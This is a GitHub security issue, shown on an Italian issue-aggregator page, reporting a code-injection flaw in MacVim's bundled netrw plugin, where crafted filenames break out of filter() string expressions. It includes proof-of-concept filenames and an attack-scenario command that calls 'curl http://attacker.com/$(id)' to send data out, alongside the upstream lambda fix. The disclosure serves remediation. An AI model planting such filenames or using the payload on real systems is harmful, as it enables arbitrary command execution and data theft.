macvim-dev / macvim-dev/macvim

[Security] MacVim affected by GHSA-66hr-7p6x-x5j3 — netrw NetrwMarkFile() code injection via crafted filename (vim < 9.2.0480)

Aperta
#1,656 0 commenti 0 reazioni 0 assegnatari Vedi su GitHub

Nessuno ha ancora preso questa issue.

Lingua principale
Vim Script
Stelle
7.9k
Fork
691
Metriche di merge delle PR
Nessuna PR unita negli ultimi 30g

Descrizione

Summary

MacVim bundles the netrw plugin (runtime/pack/dist/opt/netrw/autoload/netrw.vim) which contains s:NetrwMarkFile() with a code injection vulnerability. When unmarking files from the global marked-file list, a filename is interpolated into a string expression passed to filter(), allowing a crafted filename containing a double quote " to break out of the quoted string and execute arbitrary Vimscript. The fix from vim 9.2.0480 (8af0f098c3a42a28661d0295364e6e0fd7dbc92c) has not been applied to macvim r183.

Vulnerability Details

  • GHSA: GHSA-66hr-7p6x-x5j3
  • CVE: CVE-2026-43961
  • Upstream fix (vim): 9.2.0480 (commit 8af0f098c3a42a28661d0295364e6e0fd7dbc92c, 2026-05-14)
  • Affected code: runtime/pack/dist/opt/netrw/autoload/netrw.vims:NetrwMarkFile()
  • Vulnerability type: CWE-94 — Code Injection

Root Cause

In s:NetrwMarkFile(), when a file is unmarked from the global marked-file list, dname (the full path derived from directory + filename) is interpolated directly into a filter() string expression:

" runtime/pack/dist/opt/netrw/autoload/netrw.vim line 5220 (macvim r183)
call filter(s:netrwmarkfilelist,'v:val != "'.dname.'"')

If dname contains a " character, the string literal breaks and arbitrary Vimscript executes inside filter(). For example, a file named:

x" . execute("silent! !touch /tmp/pwned") . "

generates:

call filter(s:netrwmarkfilelist,'v:val != "x" . execute("silent! !touch /tmp/pwned") . ""')

which executes silent! !touch /tmp/pwned.

A second vulnerable call at line 7239 uses the same pattern:

call filter(w:netrw_treedict[dir],'v:val !~ "'.escape(pat,'\\').'"')
Attack Scenario
  1. Attacker places a maliciously named file in the project directory:
    touch 'x" . execute("silent! !curl http://attacker.com/$(id)") . "'
    
  2. Victim opens the directory in MacVim's netrw (:Explore), marks the file with mf, then unmarks it with mf again.
  3. The second mf triggers the filter() removal path — injected Vimscript executes arbitrary shell commands.

Verification

$ grep -n "filter.*netrwmarkfilelist" runtime/pack/dist/opt/netrw/autoload/netrw.vim
5179:    call filter(s:netrwmarkfilelist_{curbufnr},'v:val != a:fname')
5220:    call filter(s:netrwmarkfilelist,'v:val != "'.dname.'"')

Line 5220 interpolates dname into the filter string. The fix has not been applied:

$ git log --all --oneline | grep -i "9.2.0480\|NetrwMarkFile"
(no output)

Suggested Fix

Merge vim patches up to at least 9.2.0480. The fix converts string-based filter() calls to lambda form:

" Fixed (vim 9.2.0480):
call filter(s:netrwmarkfilelist_{curbufnr}, {_, v -> v !=# a:fname})
call filter(s:netrwmarkfilelist, {_, v -> v !=# dname})
call filter(w:netrw_treedict[dir], {_, v -> v !~# pat})

References

Guida per i contributori

Apri la guida per i contributori

Come iniziare

  1. Leggi tutta la issue e poi la guida ai contributi del progetto.
  2. Commenta sulla issue per dire che te ne occupi tu — evita che due persone facciano lo stesso lavoro.
  3. Fai un fork del repository e lavora su un branch.
  4. Apri una pull request che faccia riferimento al numero della issue.

Direzione di ricerca

Inizia in runtime/pack/dist/opt/netrw/autoload/netrw.vim, in s:NetrwMarkFile(), soprattutto nelle chiamate a filter() intorno alle righe 5220 e 7239. Confronta questi punti di chiamata con il commit di Vim 8af0f098c3a42a28661d0295364e6e0fd7dbc92c, quindi prova il flusso di marcatura/rimozione della marcatura di :Explore di netrw con un nome file contenente una virgoletta doppia. Il lavoro è completato quando il nome file creato per il test non esegue più Vimscript attraverso nessuno dei due percorsi di filter.

Scritto dal modello di indicizzazione a partire dal testo della issue.

Valutazione

Stack tecnologico
vim
Ambito
security
Tipo di issue
Bug
Difficoltà
3/5
Tempo stimato
1-2 giorni
Stato di attività
Tranquilla
Chiarezza
Specificata chiaramente
Idoneità per principianti
72/100

Ricevi le nuove issue nella tua casella

Un breve riepilogo di issue GitHub adatte ai principianti.